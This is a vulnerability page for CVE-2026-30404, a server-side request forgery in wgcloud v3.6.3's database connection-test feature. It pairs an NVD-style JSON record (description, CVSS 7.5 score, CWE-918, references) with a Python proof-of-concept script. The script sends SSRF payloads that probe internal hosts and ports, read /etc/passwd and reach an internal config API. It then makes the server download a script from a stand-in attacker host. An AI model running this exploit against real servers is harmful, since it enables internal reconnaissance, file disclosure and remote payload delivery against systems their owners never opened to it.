CVE-2026-30404

import requests import sys # CVE-2026-30404 SSRF PoC for wgcloud v3.6.3 # Database connection test feature SSRF vulnerability target = sys.argv[1] if len(sys.argv) > 1 else 'http://target:8080' # SSRF payloads to test internal network payloads = [ # Probe localhost 'http://127.0.0.1:22', # Probe internal service 'http://192.168.1.1:80', # Read local file 'file:///etc/passwd', # Internal API access 'http://localhost:8080/internal/api/config' ] endpoint = f'{target}/db/test/connection' for payload in payloads: data = { 'host': payload, 'port': '3306', 'type': 'mysql' } try: response = requests.post(endpoint, data=data, timeout=10) print(f'Payload: {payload}') print(f'Status: {response.status_code}') print(f'Response: {response.text[:200]}') print('---') except Exception as e: print(f'Error testing {payload}: {e}') # Malicious file download via SSRF print('\nTesting malicious file download...') malicious_url = 'http://attacker.com/malicious.sh' data = { 'url': malicious_url, 'action': 'download' } requests.post(f'{target}/db/fetch', data=data)

{"cve": {"id": "CVE-2026-30404", "sourceIdentifier": "[email protected]", "published": "2026-03-19T16:16:02.060", "lastModified": "2026-04-02T12:20:21.730", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The backend database management connection test feature in wgcloud v3.6.3 has a server-side request forgery (SSRF) vulnerability. This issue can be exploited to make the server send requests to probe the internal network, remotely download malicious files, and perform other dangerous operations."}, {"lang": "es", "value": "La característica de prueba de conexión de gestión de base de datos de backend en wgcloud v3.6.3 tiene una vulnerabilidad de falsificación de petición del lado del servidor (SSRF). Este problema puede ser explotado para hacer que el servidor envíe peticiones para sondear la red interna, descargar archivos maliciosos de forma remota y realizar otras operaciones peligrosas."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wgstart:wgcloud:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.6.3", "matchCriteriaId": "CE012BD6-0C9B-4F63-957E-78C9565F977C"}]}]}], "references": [{"url": "https://github.com/TTTlw1024/qwe/issues/3", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/tianshiyeben/wgcloud/issues/98", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}